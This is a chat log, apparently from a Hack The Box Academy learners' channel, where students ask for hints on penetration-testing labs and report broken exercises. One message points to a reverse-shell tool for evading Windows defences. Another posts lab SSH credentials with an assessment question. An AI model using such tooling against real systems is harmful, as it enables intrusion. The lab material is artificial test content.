https://academy.hackthebox.com/app/module/147/section/1328

lol lord have mercy

on my side it shows nothing

Not *

for pivoting module, RDP and SOCKS Tunneling with SocksOverRDP, where am i even supposed to get the dll mentioned in the coursee

Hey looking for a nudge on the following module, I've tried the attack from Windows and Linux but in both cases I get the same errors, I must be missing something...

Module: Active Directory Trust Attacks
Section: Skills Assessment
Question: Gain access to the DC03 (Apexcargo.ad) and submit the contents of the flag located in "C:\Users\Administrator\Desktop\flag.txt"

I tried all of that, but still nothing. So, I first rebooted my pc, then turned on the VM. From the VM Kali Linux, I used xfreerdp to log in to the foothold pc, I tried accessing lab.inlanefreight.local, but it redirects me to the https version, so I stopped HTTPS everywhere extension, tried again, still unreachable. So, I tried pinging the host-3, but the port is unreachable.

Then I tried using the foothold PC via SSH; the same issue persists there too. Host 3 is unreachable.

and this is password cracking module in cpts

because ave change my network 4 times and its still not showing the vpn

for those who struggles in windows evasion SA 2 use this repo https://github.com/bitsadmin/revbshell

was having trouble this morning connecting to anything for the smtp footprinting module via vpn file, doing it on pwnbox worked

it has been fixed thans htb

Also stuck here, can I DM?

Scan the third host, I believe you're just doing something fundamentally wrong/misunderstanding what youre meant to do

Host 3 isnt a 10.129.x.x host

To be clear this is the shells/payloads assessment yeah?

I have also seen in writeups that the third host's ip is always something like this: 172.16.1.13, but I am confused why the third host's ip is 10.129.201.134

Yes, you r right

Its not, the engagement explicitly tells you what the third host is

Hello all! I am working on the AI Red Team path.

Applications of AI in InfoSec

I am the final module : Skills Assessment

Model Validation Feedback

Your model accuracy is 0.0. Please improve it to at least 90% to receive the flag.

Locally my accuracy seems to be around 0.9?

im in privelage escaletion module and im trying to get root im in as user2 but i just cant connect the reverse shell to my system
can somone DM me?

@tired locust Please take care not to post content from modules above tier 0. If you feel like you need to reveal more info you can ask someone to DM.

Okay

i didnt know sorry

Hi is XXE injection covered in CWEE?

Or anything like it?

i am doing introduction to networking, and i can't work out how to answer these types of questions. "Submit the decimal representation of the subnet mask from the following CIDR: 10.200.20.0/27"

Decimal = using the numbers 0-9; subnet masks are left-filled 1s (every multiple of 8 is solved)

Remember that ips are in octets (sets of eight 1s)

And each octet are in a range of 0-255, the leftmost of the octet is the highest value (128) and each one subsequent is halved until you get to 1 (128 64 32 16 8 4 2 1) and you just add them together

To make it simpler we can break down /27 (the cidr representation of the subnet mask)
27/8 = 3 remainder 3
This means we have 3 sets of full octets (11111111) a quick way to remember its decimal value is 256-1 since if you had 9 bits, the leftmost bit would be 256 (powers of 2).
The 3 remainder bits are 11100000, subnet masks are never ambiguous and you will never run into cases where you'll have a mask with separated 1s.
Lets look at the decimal table again
128 | 64 | 32 | 16 | 8 | 4 | 2 | 1
1 | 1 | 1 | 0 | 0| 0 | 0 | 0

Add those together to get the last value

so 255.255.255(because full octets) plus the remainder of three means the first three (128, 64, 32 added togther) is .224, so 255.255.255.224

thanks, i kinda get it now

thanks

can someone help me in Windows PrivEsc -> windows server section?

i just cant escalate

XXE is a topic covered in the CWES path iirc

Hi there, I am doing this module "SQLMap Essentials" and in the Attack Tuning section the lab is broken. From db I am getting slightly different flag as compare to what the lab actually accepts as answer. Please take a look in that

Is anyone else finding that the targets keep crashing/become unresponsive after a few minutes? I'm finding this is happening pretty frequently in the shells & payloads module

hi guys, I can't find way to solve it, pls help me, Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>)
SSH to 10.129.202.64 (ACADEMY-PWATTACKS-NIX01), with user "sam" and password "B@tm@n2022!"
this question is from Spraying, Stuffing, and Defaults

Anyone done this module that could send a nudge?

quick question, if i started the Web Penetration Tester path in htb academy
in what order do i do the modules? from top to bottom? or by tiers

Top to bottom

ty

Hi all, does anyone have experience with the module attcking common application, osTicket. Can you tell how to find out the login credential for the exercise question?

@elder kindle I haven't done that module and I'm on my phone, but are you sure it's not inlanefreight.htb?

followup question, did anyone make a list of boxes/exercises per module to implement the module's topic?

cuz the mini exercise at the end of each page isnt that much

Hi guys, is anyone else experiencing some with the modules being broken? I'm trying to follow along with the pentest in a nutshell module but the Linux System Enumeration section just wont load, instead redirecting me to the following section. just trying to find out if the problem is on my end or not 😅

trying to install sshuttle for the SSH Pivoting with Sshuttle module but keeps returning error: "unable to locate package shuttle"

anyone has any tips on how to overcome this? Tried a couple of suggestions by ChatGPT and google search results but they failed as well.

Hello folks... I am on the "Applications of AI in infosec" module, "Spam dectection, model evaluation" section, and my vm does not seem to be connecting to the internet. I don't know if it is just me or what... I can not upload my model.

It is part of the Linux Essentials where you need to perform curl magic to find paths. But the curl does not resolve in the pwnbox. I fixed it by downloading the HTML source from a webbrowser, but it feels that this is not how this exercise was designed.

Hi guys, hitting an error while trying to logging with the credentials provided by HTB.. I reset IP target machine twice, but not able to login to the Hive platform.

Hello
Anyone available for the HTTP Misconfigurations - Skills Assessment - Hard

woo

@green vortex

woo

hype hype

damn

wooo

noice

hype hype

hypw

beta key when

why make channels

when its not open to public

🤷‍♂️

Get root and find out

no way

no way
@fair slate Try

sooooooooooon

nowwwwwwww

now

what do you mean @rustic sage ? just treat it as any other weekly release box